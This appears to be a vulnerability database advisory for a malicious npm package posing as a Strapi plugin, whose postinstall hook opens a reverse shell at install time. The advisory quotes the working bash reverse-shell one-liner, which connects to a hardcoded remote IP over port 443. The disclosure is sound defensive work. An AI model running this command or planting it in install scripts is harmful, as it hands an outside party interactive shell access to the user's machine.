VDB
GCVE-110-OSM-2026-12122
GCVE-110-OSM-2026-12122
Advisory PublishedCVSS 8.8/10
The package's postinstall lifecycle script (`scripts.postinstall: node postinstall.js`) unconditionally invokes `/bin/bash` with an interactive reverse-shell payload at install time: `bash -c 'bash -i > /dev/tcp/14.225.210.85/443 0>&1'`. This connects stdin/stdout/stderr of an interactive bash session to a hardcoded remote host over TCP/443, handing full shell access on the installer's machine to whoever controls that endpoint. A marker file is also written under /tmp confirming execution. The manifest self-labels the package as a `Reverse shell payload for Strapi`. Any `npm install` of this package results in remote code execution and interactive shell access as the installing user.
ENTRY
postinstall.js (install-hook: node postinstall.js)
- Install Hook Executes Local JS File in package.json
ADDITIONAL FINDINGS
- Shell Command Execution in postinstall.js: "require('child_process')"
PAYLOAD FILES
postinstall.js
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
8.8/10
High · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | strapi-plugin-ccresh-meeb | all (affected) | — |
Aliases
Browse GCVE Records
386 records in the GCVE database · Updated September 16, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.